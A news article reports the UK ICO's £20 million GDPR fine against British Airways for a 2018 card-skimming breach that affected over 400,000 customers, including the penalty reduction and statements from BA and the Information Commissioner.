A £20 million (€22m) General Data Protection Regulation (GDPR) fine has been sanctioned against British Airways in the United Kingdom following a breach that affected the private data of more than 400,000 customers.
Following an investigation by the Information Commissioner’s Office (ICO) when the breach was first reported, a financial penalty of £184 million (€204 million) was imposed on BA.
British Airways appealed the penalty. The ICO considered BA’s arguments which included the current economic circumstances due to COVID-19, and the penalty was reduced. The breach happened when hackers loaded malicious code on the e-commerce platform on the BA website, which was used to skim and exfiltrate credit card data.
The hackers are believed to have been able to access the private data of up to 429,612 BA customers and staff, 244,000 of whom potentially had their names, addresses, payment card numbers and CVV codes stolen. The combined card and CVV numbers of 77,000 customers and card numbers only for 108,000 customers were stolen.
The outcome of the official review into the incident showed that BA did not have the required security measures in place to safeguard the huge collection of personal data it was processing for customers. Insufficient monitoring meant that the hack remained unnoticed for two-months in 2018. ICO adjudicators determined the airline should have recognized, and tackled, the flaws prior to the hack occurring, which would have kept the data of BA customers private and confidential.
British Airways chairperson Alex Cruz released a statement about the settlement saying, “We are surprised and disappointed in this initial finding from the ICO. British Airways responded quickly to a criminal act to steal customers’ data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft.”
Information Commissioner Elizabeth Denham commented saying: “People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure. Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result. That’s why we have issued BA with a £20m fine – our biggest to date. When organisations take poor decisions around people’s personal data, that can have a real impact on people’s lives. The law now gives us the tools to encourage businesses to make better decisions about data, including investing in up-to-date security.”